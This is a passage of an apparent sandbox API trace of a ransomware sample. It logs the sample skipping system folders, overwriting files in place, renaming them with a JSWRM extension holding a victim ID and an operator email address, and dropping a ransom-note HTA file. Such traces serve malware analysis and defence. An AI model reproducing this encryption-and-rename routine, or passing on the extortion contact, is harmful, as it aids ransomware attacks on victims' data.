0x22c6f0 [0060.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0060.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0060.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0060.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0060.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.343] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), lpNewFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0060.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0060.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0060.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0060.344] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0060.344] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2=".") returned 1 [0060.344] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="..") returned 1 [0060.344] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="...") returned 1 [0060.344] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="windows") returned -1 [0060.344] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="recovery") returned -1 [0060.344] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="perflogs") returned -1 [0060.344] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="documents and settings") returned -1 [0060.344] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.344] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="system volume information") returned -1 [0060.344] lstrcmpiW (lpString1="DisplayIcon.ico", lpString2="msocache") returned -1 [0060.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0060.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayIcon.ico", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0060.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayIcon.ico", cchWideChar=15, lpMultiByteStr=0x345f978, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayIcon.ico", lpUsedDefaultChar=0x0) returned 15 [0060.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0060.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0060.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayIcon.ico", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0060.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayIcon.ico", cchWideChar=15, lpMultiByteStr=0x345f948, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayIcon.ico", lpUsedDefaultChar=0x0) returned 15 [0060.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0060.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0060.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0060.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0060.345] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0060.346] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=88533) returned 1 [0060.346] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x159d0) returned 0x2471a8 [0060.346] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x159d0, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x159d0, lpOverlapped=0x0) returned 1 [0060.353] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.353] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x159d0, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x159d0, lpOverlapped=0x0) returned 1 [0060.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.353] CloseHandle (hObject=0x450) returned 1 [0060.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0060.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0060.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0060.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0060.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0060.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.355] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), lpNewFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0060.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0060.360] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Extended", cAlternateFileName="")) returned 1 [0060.360] lstrcmpiW (lpString1="Extended", lpString2=".") returned 1 [0060.360] lstrcmpiW (lpString1="Extended", lpString2="..") returned 1 [0060.360] lstrcmpiW (lpString1="Extended", lpString2="...") returned 1 [0060.360] lstrcmpiW (lpString1="Extended", lpString2="windows") returned -1 [0060.360] lstrcmpiW (lpString1="Extended", lpString2="recovery") returned -1 [0060.360] lstrcmpiW (lpString1="Extended", lpString2="perflogs") returned -1 [0060.361] lstrcmpiW (lpString1="Extended", lpString2="documents and settings") returned 1 [0060.361] lstrcmpiW (lpString1="Extended", lpString2="$RECYCLE.BIN") returned 1 [0060.361] lstrcmpiW (lpString1="Extended", lpString2="system volume information") returned -1 [0060.361] lstrcmpiW (lpString1="Extended", lpString2="msocache") returned -1 [0060.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0060.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0060.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0060.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0060.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2266b0 [0060.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0060.361] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\extended\\jswrm-decrypt.hta")) returned 0xffffffff [0060.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2266b0 | out: hHeap=0x1e0000) returned 1 [0060.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0060.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0060.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0060.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0060.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0060.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0060.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226630 [0060.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0060.361] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\extended\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0060.362] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.362] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0060.363] CloseHandle (hObject=0x450) returned 1 [0060.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226630 | out: hHeap=0x1e0000) returned 1 [0060.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0060.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0060.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0060.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0060.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225f30 [0060.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0060.363] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Extended\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\extended\\jswrm-decrypt.hta")) returned 0x20 [0060.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225f30 | out: hHeap=0x1e0000) returned 1 [0060.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0060.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0060.363] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1aa4903f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName=".", cAlternateFileName="")) returned 0x232040 [0060.364] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.364] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1aa4903f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="..", cAlternateFileName="")) returned 1 [0060.364] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.364] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.364] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aa4903f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1aa4903f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1aa4903f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0060.364] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0060.364] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0060.364] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0060.364] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0060.364] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0060.364] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0060.364] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0060.364] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0060.364] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0060.364] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0060.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0060.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0060.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0060.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0060.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0060.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0060.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0060.364] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0060.364] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2=".") returned 1 [0060.365] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="..") returned 1 [0060.365] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="...") returned 1 [0060.365] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="windows") returned -1 [0060.365] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="recovery") returned -1 [0060.365] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="perflogs") returned -1 [0060.365] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="documents and settings") returned 1 [0060.365] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="$RECYCLE.BIN") returned 1 [0060.365] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="system volume information") returned -1 [0060.365] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="msocache") returned 1 [0060.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Parameterinfo.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0060.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Parameterinfo.xml", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Parameterinfo.xml", lpUsedDefaultChar=0x0) returned 17 [0060.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Parameterinfo.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0060.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Parameterinfo.xml", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Parameterinfo.xml", lpUsedDefaultChar=0x0) returned 17 [0060.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x1ee520 [0060.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0060.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.365] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0060.365] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 